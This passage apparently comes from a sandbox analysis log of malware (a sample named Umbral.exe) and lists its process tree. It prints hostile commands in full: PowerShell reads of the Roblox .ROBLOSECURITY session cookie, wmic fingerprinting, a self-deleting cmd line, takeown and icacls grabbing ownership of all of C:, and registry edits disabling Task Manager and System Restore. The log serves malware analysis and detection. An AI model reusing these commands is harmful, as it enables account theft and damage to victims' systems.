      PID:2008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4876
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1544
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2084
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      4⤵
      PID:3172
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      4⤵
      PID:4868
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1496
  - - C:\Windows\System32\Wbem\wmic.exe
      "wmic" path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4292
  - - C:\Windows\SYSTEM32\cmd.exe
      "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Suspicious use of WriteProcessMemory
      PID:916
    - - C:\Windows\system32\PING.EXE
        
        ping localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4584
- - C:\Windows\system32\takeown.exe
    takeown /f C:\*.*
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:4492
- - C:\Windows\system32\icacls.exe
    Icacls C:\*.* /C /G Admin:F
    3⤵
    - Possible privilege escalation attempt
    - Modifies file permissions
    PID:3328
- - C:\Windows\system32\reg.exe
    REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1556
- - C:\Windows\system32\reg.exe
    reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:2924
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14329.vbs"
    3⤵
    PID:548
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      Enumerates system info in registry
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      PID:1480
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xb8,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:4112
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2032 /prefetch:2
        5⤵
        
        PID:4228
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:3144
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2828 /prefetch:8
        5⤵
        
        PID:5168
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1
        5⤵
        
        PID:5292
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
        5⤵
        
        PID:5300
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4456 /prefetch:1
        5⤵
        
        PID:5700
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5128 /prefetch:1
        5⤵
        
        PID:5480
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5356 /prefetch:1
        5⤵
        
        PID:5944
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1
        5⤵
        
        PID:6316
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:1
        5⤵
        
        PID:6872
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:1
        5⤵
        
        PID:6676
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3876 /prefetch:1
        5⤵
        
        PID:6312
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5904 /prefetch:1
        5⤵
        
        PID:7040
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
        5⤵
        
        PID:7396
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6660 /prefetch:1
        5⤵
        
        PID:7816
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6516 /prefetch:1
        5⤵
        
        PID:8148
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7516 /prefetch:1
        5⤵
        
        PID:7492
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1
        5⤵
        
        PID:7744
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2024,8284217200643416704,8375321515086948853,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7136 /prefetch:8
        5⤵
        
        PID:8876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5592
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:5612
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5160
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:5280
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:5856
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:5868
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:6252
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:6264
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:6800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:6812
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:6560
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:6592
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:7136
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:6168
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:6784
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:6832
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:7332
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0x78,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:7344
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:7752
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:7764
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8080
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:8092
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:7244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:7296
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:7640
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffaa8c23cb8,0x7ffaa8c23cc8,0x7ffaa8c23cd8
        5⤵
        
        PID:7652
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:7644
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8224
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8436
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8712
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8824
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8956
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:9104
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:9148
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:9196
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8312
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
      4⤵
      PID:8388
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://theshitposter78.github.io/cactus
